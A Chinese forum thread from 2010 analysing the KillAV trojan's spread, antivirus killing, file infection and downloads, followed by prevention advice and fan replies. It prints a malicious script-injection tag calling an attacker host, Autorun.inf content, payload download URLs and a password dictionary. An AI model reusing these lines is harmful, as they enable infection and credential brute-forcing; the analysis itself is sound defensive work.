------------极虎AV终结者详细分析(非OD汇编分析)----------------
本帖最后由 听海 于 2010-8-25 12:43 编辑原始样本名称:Setup.exe
样本大小:243KB
SHA值:E6FD82F5B0D4DB6E08F1B6D73E55C9224E14E53E
获取途径:优盘下的recycle.{645FF040-5081-101B-9F08-00AA002F954E}文件夹中。
安全阁鉴定结果:病毒----命名为Trojan.Win32.KillAV.A。运行平台Windows平台。
分析人:安全阁阁主
一、样本的主要行为:
替换系统服务关联程序,加载驱动对抗杀软,破坏安全模式、感染磁盘文件、感染共享文件、利用局域网传播、利用移动设备传播、下载文件。
二、此病毒的爆发方式:
计算机病毒的爆发方式通常取决于该病毒的传播方式。
此病毒的传播方式有三种:
1、此病毒感染系统中或局域网中的EXE文件和压缩包中的EXE文件,当未感染病毒的用户双击了受感染的EXE文件,因为被感染,所以病毒代码首先拿到控制权,将创建一个c:\booter.exe文件,然后运行启动它,之后再把控制权交还给被感染的文件。这样病毒在此用户计算机上爆发。
2、此病毒将在移动设备(如:优盘)中写入病毒即Autorun.inf文件,当未感染病毒的用户计算机开启了移动设备的自动播放功能,并且在其计算机上使用了带毒的移动设备,而且是通过双击操作打开的移动设备盘符,此时病毒利用Windows自动播放功能将运行在移动设备中的recycle.{645FF040-5081-101B-9F08-00AA002F954E}\Setup.exe文件。这样病毒此用户计算机上爆发。
3、此病毒在局域网中某台计算机上爆发后,将利用自身携带的密码字典尝试登录局域网的中其他计算机,如果登录成功则将病毒样本上传到那台计算机中C盘,命名为CONFIG.exe(c:\CONFIG.exe),并且设置一个计划任务------待上传样本3分钟后病毒自动运行,从而爆发。
三、病毒爆发后的主体行为如下:
1、判断自身爆发的路径是不是移动设备,如果是则把该路径盘符打开。(这样做的目的是:因为移动设备利用自动播放Autorun.inf功能可以达到双击盘符运行指定程序的目的,但是这样每次双击盘符就只能运行Autorun.inf中指定的程序,而不能再打开移动设备的盘符了。这无疑会使用户起疑,所以病毒在运行的同时帮助用户打开了盘符。又因为病毒的运行是悄无声息的,所以给用户的感觉是双击盘符就打开了,从而不会怀疑自己中毒了。)
2、尝试打开管道\\\\.\\pipe\\96DBA249-E88E-4c47-98DC-E18E6E,并且与之通信。(如果计算机上已经运行有此病毒,则会创建这个管道,与以后运行的病毒进行通信)如果通信成功则说明计算机中已经运行了该病毒,此时则保存已运行的计算机病毒通过管道发送过来的服务名。病毒在C盘下创建文件C:\delinfo.bin,其中的内容是:4个字节的标志位(此标志位的值取决于与管道通信是否成功,成功则标志位的值是1,否则是2。该标志位用于之后病毒操作的判断),然后是病毒自身的完整路径。病毒创建这个文件的目的是为了告诉之后的病毒自己的位置,然后把自己删掉。
3、循环执行解密操作,解密样本中的字符串,每次循环解密两次:一次解密的得到的是服务名另一次解密得到的是服务对应的动态链接库名。
如果完全循环完毕则最终得到的解密串如下:
服务名有:
AppMgmt.BITS.FastUserSwitchingCompatibility.WmdmPmSN.xmlprov.EventSystem.Ntmssvc.upnphost.SSDPSRV.Net
man.Nla.Tapisrv.Browser.CryptSvc.helpsvc.RemoteRegistry.Schedule
(这些串实际上对应于注册表中HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost路径下netsvcs类型的若干服务名称)
动态链接库有:
appmgmts.qmgr.shsvcs.mspmsnsv.xm lprov.es.ntmssvc .upnphost.ssdpsr v.netman.mswsock
.tapisrv.browser.cryptsvc.pchsvc.regsvc.schedsvc
(这些串实际上对应于以上服务所要加载的动态链接库的名字)
在循环过程中,每得到一个服务名,则与先前进行管道通信时得到的服务名进行比较,如果一致则继续循环解密下一个,如果不一致则执行以下操作(这样判断以保证病毒不会重复运行同一个服务,而是每次运行一个不同的服务):
打开此服务,检测此服务状态是否运行,如果运行将其停止。关闭系统对该服务所对应动态库的文件保护,然后把病毒自身文件的属性修改为动态链接库,并替换此服务对应的动态库为修改后的病毒自身文件。然后启动该服务从而运行病毒,最后把当前病毒进程结束。
四、病毒被以服务的形式运行起来以后的行为如下:
1、读取C:\\DelInfo.bin中的内容,将其中指定的文件删除,然后删除C:\\DelInfo.bin文件。
2、在系统中搜索avp.exe(卡巴)和bdagent.exe(BitDefender)进程,如果找到则分配4000000h大的空间内存,然后全部写入nop,并且执行,执行完毕在释放内存。(用此方法进行免杀)
3、解密字符串,解密后先后得到如下字符串:
C:\WINDOWS\WindowsUpdata7.jpg
gr4004
http://a.nba1001.com:6969/announce;
http://b.nba1001.com:6969/announce;
http://c.nba1001.com:6969/ announce;
http://d.nba1001.com:6969/announce;
http://e.nba1001.com:6969/announce;
http://f.nba1001.com:6969/announce;
http://g.nba1001.com:6969/announce;
http://h.nba1001.com:6969/announce;
http://i.nba1001.com:6969/announce;
http://j.nba1001.com:6969/announce;
up.nba1001.com
up1.nba1001.com
up2.nba1001.com
up3.nba1001.com
up4.nba1001.com
up5.nba1001.com
up6.nba1001.com
up7.nba1001.com
up8.nba1001.com
up9.nba1001.com
Down/33.rar
up
KVMonXP.kxp.KVSrvXP.exe.avp.exe.avp.exe.avp.exe.RavMonD.exe.RavTask.exe.RsAgent.exe.rsnetsvr.exe.RsTray.exe.ScanFrm.exe.CCenter.exe.
kavstart.exe.kissvc.exe.kpfw32.exe.kpfwsvc.exe.kswebshield.exe.kwatch.exe.kmailmon.exe.egui.exe.ekrn.exe.ccS vcHst.exe.ccSvcHst.exe.
ccSvcHst.exe.Mcagent.exe.mcmscsvc.exe.McNASvc.exe.Mcods.exe.McProxy.exe.Mcshield.exe.mcsysmon.exe.mcvsshld.exe.MpfSrv.exe.McSACore.exe.
msksrver.exe.sched.exe.avguard.exe.avmailc.exe.avwebgrd.exe.avgnt.exe.sched.exe.avguard.exe.avcenter.exe.UfSeAgnt.exe.TMBMSRV.exe.SfCtlCom.exe.
TmProxy.exe.360SoftMgrSvc.exe.360tray.exe.qutmserv.exe.bdagent.exe.livesrv.exe.seccenter.exe.vsserv.exe.MPSVC.exe.MPSVC1.exe.MPSVC2.exe.
MPMon.exe.ast.exe.360speedld.exe.360SoftMgrSvc.exe.360tray.exe.修复工具.exe.360hotfix.exe.360rpt.exe.360safe.exe.360safebox.exe.krnl360svc.exe.
zhudongfangyu.exe.360sd.exe.360rp.exe.360se.exe.safeboxTray.exe
4、在临时目录中释放驱动文件Forter.sys,并加载到内存。紧接着把驱动文件和为了加载驱动而创建的注册表服务项删除。
5、修改自身服务的启动方式为自启动。
6、与驱动进行通信,让驱动程序在注册表中设置镜像劫持项。劫持如下程序的运行:
ccSvcHst.exe.Mcagent.exe.mcmscsvc.exe.McNASvc.exe.Mcods.exe.McProxy.exe.Mcshield.exe.mcsysmon.exe.mcvsshld.exe.MpfSrv.exe.McSACore.exe.
msksrver.exe.sched.exe.avguard.exe.avmailc.exe.avwebgrd.exe.avgnt.exe.sched.exe.avguard.exe.avcenter.exe.UfSeAgnt.exe.TMBMSRV.exe.SfCtlCom.exe.
TmProxy.exe.360SoftMgrSvc.exe.360tray.exe.qutmserv.exe.bdagent.exe.livesrv.exe.seccenter.exe.vsserv.exe.MPSVC.exe.MPSVC1.exe.MPSVC2.exe.
MPMon.exe.ast.exe.360speedld.exe.360SoftMgrSvc.exe.360tray.exe.修复工具.exe.360hotfix.exe.360rpt.exe.360safe.exe.360safebox.exe.krnl360svc.exe.
zhudongfangyu.exe.360sd.exe.360rp.exe.360se.exe.safeboxTray.exe
7、与驱动通信,结束可能存在的杀毒软件进程。被结束的进程有:
KVMonXP.kxp.KVSrvXP.exe.avp.exe.avp.exe.avp.exe.RavMonD.exe.RavTask.exe.RsAgent.exe.rsnetsvr.exe.RsTray.exe.ScanFrm.exe.CCenter.exe.
kavstart.exe.kissvc.exe.kpfw32.exe.kpfwsvc.exe.kswebshield.exe.kwatch.exe.kmailmon.exe.egui.exe.ekrn.exe.ccS vcHst.exe.ccSvcHst.exe.
8、创建线程反复启动IE,并且打开h**p://tj.nba1001.net:7777/tj/mac.html网站,十秒钟后将其关闭然后重新启动以此增加该网站的点击率。
9、创建线程获得域名:“www.3-0B6F-415d-B5C7-832F0.com”的IP地址,笔者测试时得到"202.98.24.121",然后在如下URL下载:
h**p://202.98.24.121:8080/Down/33.rar文件并保存到C:\WINDOWS\WindowsUpdata7.jpg。然后将C:\WINDOWS\WindowsUpdata7.jpg复制到临时目录中,扩展名为.nls,文件名为一个随机数。然后将此文件映射到内存。此文件中的内容是加密数据,将其解密。然后将其中的部分数据在C:\DOCUME~1\admin\LOCALS~1\Temp路径下生成一个可执行程序,名字是个随机名。然后启动这个程序。
10、创建线程创建命名管道\\\\.\\pipe\\96DBA249-E88E-4c47-98DC-E18E6E,并且实时对其进行监听,检测是否又有同类病毒被运行,如果有则与之通信,发送自身的服务名过去。
11、删除如下注册表项:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network。
从而破坏破坏安全模式。
12、创建线程获得域名:“www.3-0B6F-415d-B5C7-832F0.com”的IP地址,笔者测试时得到"202.98.24.121",然后在如下URL下载:
下载http://202.98.24.121:8080/Down/xx.rar文件并保存到C:\DOCUME~1\admin\LOCALS~1\Temp路径下名字随机,扩展名为.txt。
读取文件内容,并且发送给驱动此文件的内容。然后将这个文件移动到如下路径:"C:\WINDOWS\system32\c_30279.nls"。
13、解密字符串,先后得到如下串:
Administrator.Guest.admin.Root
1234.password.6969.harley.123456.golf.pussy.mustang.1111.shadow.1313.fish.5150.7777.
qwerty.baseball.2112.letmein.12345678.12345.ccc.admin.5201314.qq520.1.12.123.1234567.
123456789.654321.54321.111.000000.abc.pw.11111111.88888888.pass.passwd.database.
abcd.abc123.pass.sybase.123qwe.server.computer.520.super.123asd.0.ihavenopass.
godblessyou.enable.xp.2002.2003.2600.alpha.110.111111.121212.123123.1234qwer.123abc.
007.a.aaa.patrick.pat.administrator.root.sex.god.****you.****.abc.test.test123.
temp.temp123.win.pc.asdf.pwd.qwer.yxcv.zxcv.home.xxx.owner.login.Login.pw123.love.
mypc.mypc123.admin123.mypass.mypass123.901100.
<script type="text/javascript" src="http://web.nba1001.net:8888/tj/tongji.js"></script>.
14、修改host文件屏蔽如下网站:
duba.net
rising.com.cn
360safe.com
eset.com.cn
jiangmin.com
antivir-pe.com
antivir-pe.de
symantecliveupdate.com
nai.com
micropoint.com.cn
kaspersky.com
kafan.cn
366tian.net
ikaka.com
vc52.cn
aikaba.com
janmeng.com
360.cn
bitdefender.com
symantec.com
sky.net.cn
norman.com
sunbelt-software.com.
ahn.com.cn
drweb.com.cn
free-av.com.avast.com
15、判断"C:\Program Files\WinRAR\Rar.exe"文件是否存在,如果存在保存路径。
16、创建线程,循环遍历所有驱动器,但排除A盘和B盘和光驱,遍历这些驱动器下的所有文件和文件夹,但是跳过C盘下的如下文件夹:
"WINDOWS"
"WinNT"
"Documents and Settings"
"System Volume Information"
"RECYCLER"
"Common Files"
"ComPlus Applications"
"InstallShield Installation Information"
"Internet Explorer"
"Messenger"
"microsoft frontpage"
"Movie Maker"
"MSN Gaming Zone"
"NetMeeting"
"Outlook Express"
"Windows Media Player"
"Windows NT"
"WindowsUpdate"
"WinRAR"
"Thunder"
"Thunder Network"
判断文件类型:
如果是exe,则在末尾添加一个节,节名为“.tc”,然后把病毒代码写到新添加的节数据区中,修改入口地址是病毒首先获得控制权。
如果是htm、html、asp、aspx 判断是否已经感染,没感染的则在末尾写如下感染代码:
<script type="text/javascript" src="http://web.nba1001.net:8888/tj/tongji.js"></script>.
如果是rar,现将压缩包里的文件解压到临时文件夹,然后感染,感染后在压缩回去,并把临时文件夹删除掉。
17、创建线程:循环查找移动设备,如果找到检测其中是否存在Autorun.inf文件夹,如果存在将其重命名为一个随即名。然后创建Autorun.inf文件,内容如下。
OPEN=recycle.{645FF040-5081-101B-9F08-00AA002F954E}\Setup.exe
shell\open=打开(&O)
shell\open\Command=recycle.{645FF040-5081-101B-9F08-00AA002F954E}\Setup.exe Show
shell\open\Default=1//
shell\explore=资源管理器(&X)
shell\explore\Command=recycle.{645FF040-5081-101B-9F08-00AA002F954E}\Setup.exe Show
并创建recycle.{645FF040-5081-101B-9F08-00AA002F954E}文件夹(把文件夹伪装成回收站,这样用户双击这个文件夹时就无法打开此文件夹,而是打开的回收站。此时用户可以给他重命名在双击打开。),在里面创建Setup.exe病毒文件。
并且将它们设为隐藏和只读属性。
18、创建线程:扫描共享资源,然后以同样的方式进行感染。
19、利用自身携带的密码字典尝试登录局域网的中其他计算机,如果登录成功则将病毒样本上传到那台计算机中C盘,命名为CONFIG.exe(c:\CONFIG.exe),并且设置一个计划任务------待上传样本3分钟后病毒自动运行。
20、最后每隔一秒半对系统进程进行一次扫描,扫描是否有指定杀毒软件进程,如果有则结束掉。
五、查杀方式:建议使用专杀工具或杀毒软件。您可以下载安全阁提供的专杀工具进行查杀:
请您到计算机反病毒工具下载版块下载:http://www.safe163.com/dispbbs.asp?boardid=8&id=55&page=1&star=1。
六、预防方式:1、关闭移动设备的自动播放功能,并且每次打开移动设备盘符不要双击,在地址栏中输入盘符和冒号再回车打开。
2、给计算机设密码,密码最好是字母数字组合,并且具有一定复杂度,不要少于8位。
3、关闭所有共享资源的写入权限。
4、运行陌生程序之前建议先进行扫描。 确实佩服,分析得这么详细。 :funk:eweqw很强大的分析! 哈哈,刚进来以为是OD分析啊`` 哇感谢楼主 非常感谢就找他 虎啊 大牛楼主 膜拜之。 进来看下分析 哇感谢楼主 非常感谢就找他
本帖最后由 a04512 于 2011-6-18 00:17 编辑
高手啊。。 膜拜这病毒。
页:
[1]